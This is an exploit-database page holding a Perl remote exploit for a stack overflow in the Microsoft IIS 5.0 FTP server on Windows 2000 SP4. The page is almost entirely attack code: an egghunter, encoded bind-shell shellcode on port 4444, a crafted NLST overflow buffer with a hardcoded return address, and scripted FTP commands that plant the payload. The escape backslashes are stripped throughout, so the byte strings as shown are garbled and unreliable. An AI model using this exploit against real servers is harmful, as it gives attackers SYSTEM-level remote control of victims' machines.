Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)
# Published : 2009-09-01
# Author : muts
# Previous Title : SIDVault 2.0e Windows Remote Buffer Overflow Exploit
# Next Title : Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket; 
$|=1; 
$sc = "x89xe2xddxc5xd9x72xf4x5fx57x59x49x49x49x49x43" .
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" .
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" .
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" .
"x50x38x41x43x4ax4ax49x45x36x4dx51x48x4ax4bx4f" .
"x44x4fx47x32x46x32x42x4ax43x32x46x38x48x4dx46" .
"x4ex47x4cx45x55x51x4ax44x34x4ax4fx48x38x46x34" .
"x50x30x46x50x50x57x4cx4bx4bx4ax4ex4fx44x35x4a" .
"x4ax4ex4fx43x45x4bx57x4bx4fx4dx37x41x41";
# ./msfpayload windows/shell_bind_tcp R |  ./msfencode -e x86/shikata_ga_nai -b "x00x0ax0d"

$shell="T00WT00W" ."xdaxdexbdx2dxe7x9bx9fx2bxc9xb1x56xd9x74x24xf4" .
"x5ax83xeaxfcx31x6ax15x03x6ax15xcfx12x67x77x86" .
"xddx98x88xf8x54x7dxb9x2ax02xf5xe8xfax40x5bx01" .
"x71x04x48x92xf7x81x7fx13xbdxf7x4exa4x70x38x1c" .
"x66x13xc4x5fxbbxf3xf5xafxcexf2x32xcdx21xa6xeb" .
"x99x90x56x9fxdcx28x57x4fx6bx10x2fxeaxacxe5x85" .
"xf5xfcx56x92xbexe4xddxfcx1ex14x31x1fx62x5fx3e" .
"xebx10x5ex96x22xd8x50xd6xe8xe7x5cxdbxf1x20x5a" .
"x04x84x5ax98xb9x9ex98xe2x65x2bx3dx44xedx8bxe5" .
"x74x22x4dx6dx7ax8fx1ax29x9fx0excfx41x9bx9bxee" .
"x85x2dxdfxd4x01x75xbbx75x13xd3x6ax8ax43xbbxd3" .
"x2ex0fx2ex07x48x52x27xe4x66x6dxb7x62xf1x1ex85" .
"x2dxa9x88xa5xa6x77x4exc9x9cxcfxc0x34x1fx2fxc8" .
"xf2x4bx7fx62xd2xf3x14x72xdbx21xbax22x73x9ax7a" .
"x93x33x4ax12xf9xbbxb5x02x02x16xc0x05xccx42x80" .
"xe1x2dx75x36xadxb8x93x52x5dxedx0cxcbx9fxcax84" .
"x6cxe0x38xb9x25x76x74xd7xf2x79x85xfdx50xd6x2d" .
"x96x22x34xeax87x34x11x5axc1x0cxf1x10xbfxdfx60" .
"x24xeax88x01xb7x71x49x4cxa4x2dx1ex19x1ax24xca" .
"xb7x05x9exe9x4axd3xd9xaax90x20xe7x33x55x1cxc3" .
"x23xa3x9dx4fx10x7bxc8x19xcex3dxa2xebxb8x97x19" .
"xa2x2cx6ex52x75x2bx6fxbfx03xd3xc1x16x52xebxed" .
"xfex52x94x10x9fx9dx4fx91xbfx7fx5axefx57x26x0f" .
"x52x3axd9xe5x90x43x5ax0cx68xb0x42x65x6dxfcxc4" .
"x95x1fx6dxa1x99x8cx8exe0x90";


print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2n"; 
if ($#ARGV ne 1) { 
print "usage: iiz5.pl <target> <your local ip>n"; 
exit(0); 
} 
srand(time()); 
$port = int(rand(31337-1022)) + 1025; 
$locip = $ARGV[1]; 
$locip =~ s/./,/gi; 
if (fork()) { 
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '21', 
                              Proto    => 'tcp'); 
$patch = "x7ExF1xFAx7F";
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms 

$v = "KSEXY" . $sc . "V" x (500-length($sc)-5); 
# top address of stack frame where shellcode resides, is hardcoded inside this block 
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53" 
   ."x45x58x59x75xF7x40x40x40x40xFFxFFxE0"; 

# attack buffer 
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. 
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. 
   "HHHHIIII". 
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN"; 
$x = <$sock>; 
print $x;                             
print $sock "USER anonimoosrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shellrn";
$x = <$sock>; 
print $x; 
print $sock "USER anonimoosrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS $shellrn";
$x = <$sock>; 
print $x; 

print $sock "USER anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "PASS anonymousrn"; 
$x = <$sock>; 
print $x; 
print $sock "MKD w00t$portrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; # We store shellcode in memory of process (stack) 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>;
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "SITE $vrn"; 
$x = <$sock>; 
print $x; 
print $sock "CWD w00t$portrn"; 
$x = <$sock>; 
print $x; 
print $sock "MKD CCC". "$crn"; 
$x = <$sock>; 
print $x; 
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "rn"; 
$x = <$sock>; 
print $x; 
# TRIGGER 
print $sock "NLST $c*/../C*/rn"; 
$x = <$sock>; 
print $x; 
while (1) {} 
} else { 
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); 
die "Could not create socket: $!n" unless $servsock; 
my $new_sock = $servsock->accept(); 
while(<$new_sock>) { 
print $_; 
} 
close($servsock); 
} 
#Cheerio, 
# 
#Kingcope

# www.Syue.com [2009-09-01]